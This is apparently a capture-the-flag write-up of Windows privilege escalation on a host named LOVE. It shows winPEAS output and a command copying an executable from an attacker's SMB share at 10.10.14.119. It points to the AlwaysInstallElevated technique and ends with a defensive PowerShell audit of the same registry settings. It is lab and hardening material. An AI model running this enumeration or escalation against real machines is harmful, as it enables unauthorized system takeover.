3 privesc

systeminfo

Host Name:                 LOVE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
System Type:               x64-based PC

PEAS

copy \\10.10.14.119\drive\win.exe
       1 file(s) copied.
[+] Cached Creds
  [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
   cachedlogonscount is 10
   
[+] UAC Status
  [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
   ConsentPromptBehaviorAdmin: 0 - No prompting
   EnableLUA: 1
   LocalAccountTokenFilterPolicy: 1
   FilterAdministratorToken: 0
     [*] LocalAccountTokenFilterPolicy set to 1.
     [+] Any local account can be used for lateral movement.

[+] PowerShell Settings
   PowerShell v2 Version: 2.0
   PowerShell v5 Version: 5.1.19041.1
   PowerShell Core Version:
   Transcription Settings:
   Module Logging Settings:
   Scriptblock Logging Settings:
   PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
   PS history size: 51B

[+] Checking AlwaysInstallElevated
  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
   AlwaysInstallElevated set to 1 in HKLM!
   AlwaysInstallElevated set to 1 in HKCU!
   
[+] Enumerating NTLM Settings
LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default

Using https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
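The PEAS findings above (AlwaysInstallElevated in both hives, silent admin elevation, remote UAC filtering disabled, ten cached logons) can be re-checked from the defender's side with a short audit script. The following is an added example and is not part of the original writeup or of winPEAS; it reads the same registry locations PEAS reports, classifies each as OK or WEAK, and prints a remediation hint. The thresholds and hints are assumptions based on common hardening baselines, not values taken from the page.

```powershell
# Added example (not from the writeup or winPEAS): audit the registry settings
# flagged in the PEAS output and report which ones need hardening.
# Thresholds below (e.g. cached logons <= 4) are assumed baseline values.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Return $null when the key or the value is absent instead of throwing.
    if (-not (Test-Path -Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

$policySystem = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$installerPol = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

$checks = @(
    @{ Name = 'AlwaysInstallElevated (HKLM)'; Path = "HKLM:\$installerPol"; Value = 'AlwaysInstallElevated'
       Weak = { param($v) $v -eq 1 }
       Fix  = 'Delete the value or set it to 0; with 1 any user can install MSI packages as SYSTEM' },
    @{ Name = 'AlwaysInstallElevated (HKCU)'; Path = "HKCU:\$installerPol"; Value = 'AlwaysInstallElevated'
       Weak = { param($v) $v -eq 1 }
       Fix  = 'Delete the value or set it to 0 (the policy is only effective when both hives are 1)' },
    @{ Name = 'EnableLUA'; Path = $policySystem; Value = 'EnableLUA'
       Weak = { param($v) $v -ne 1 }
       Fix  = 'Set to 1 to keep UAC enabled' },
    @{ Name = 'ConsentPromptBehaviorAdmin'; Path = $policySystem; Value = 'ConsentPromptBehaviorAdmin'
       Weak = { param($v) $v -eq 0 }
       Fix  = 'Set to 2 (prompt for consent on the secure desktop); 0 elevates admins silently' },
    @{ Name = 'LocalAccountTokenFilterPolicy'; Path = $policySystem; Value = 'LocalAccountTokenFilterPolicy'
       Weak = { param($v) $v -eq 1 }
       Fix  = 'Delete the value or set it to 0 so remote logons by local admins receive a filtered token' },
    @{ Name = 'FilterAdministratorToken'; Path = $policySystem; Value = 'FilterAdministratorToken'
       Weak = { param($v) $v -ne 1 }
       Fix  = 'Set to 1 so the built-in Administrator account also runs in Admin Approval Mode' },
    @{ Name = 'CachedLogonsCount'; Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'; Value = 'CachedLogonsCount'
       # Stored as REG_SZ; Windows behaves as if it were 10 when the value is missing.
       Weak = { param($v) if ($null -eq $v) { $v = 10 }; [int]$v -gt 4 }
       Fix  = 'Lower to 4 or fewer on domain-joined workstations (0 on servers) to limit cached credential material' }
)

$report = foreach ($c in $checks) {
    $current = Get-RegValue -Path $c.Path -Name $c.Value
    $isWeak  = [bool](& $c.Weak $current)
    $display = if ($null -eq $current) { '<not set>' } else { $current }
    $status  = if ($isWeak) { 'WEAK' } else { 'OK' }
    $fix     = if ($isWeak) { $c.Fix } else { '' }
    [PSCustomObject]@{
        Check   = $c.Name
        Current = $display
        Status  = $status
        Fix     = $fix
    }
}

$report | Format-Table -AutoSize -Wrap
```

Run it in an elevated PowerShell session on the host being reviewed; against a machine configured like the one above, the two AlwaysInstallElevated rows, ConsentPromptBehaviorAdmin, LocalAccountTokenFilterPolicy, FilterAdministratorToken and CachedLogonsCount would all report WEAK. Note that a missing value is treated as the secure default for AlwaysInstallElevated and LocalAccountTokenFilterPolicy, but as a gap for EnableLUA and FilterAdministratorToken, since those should be explicitly enforced by policy.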
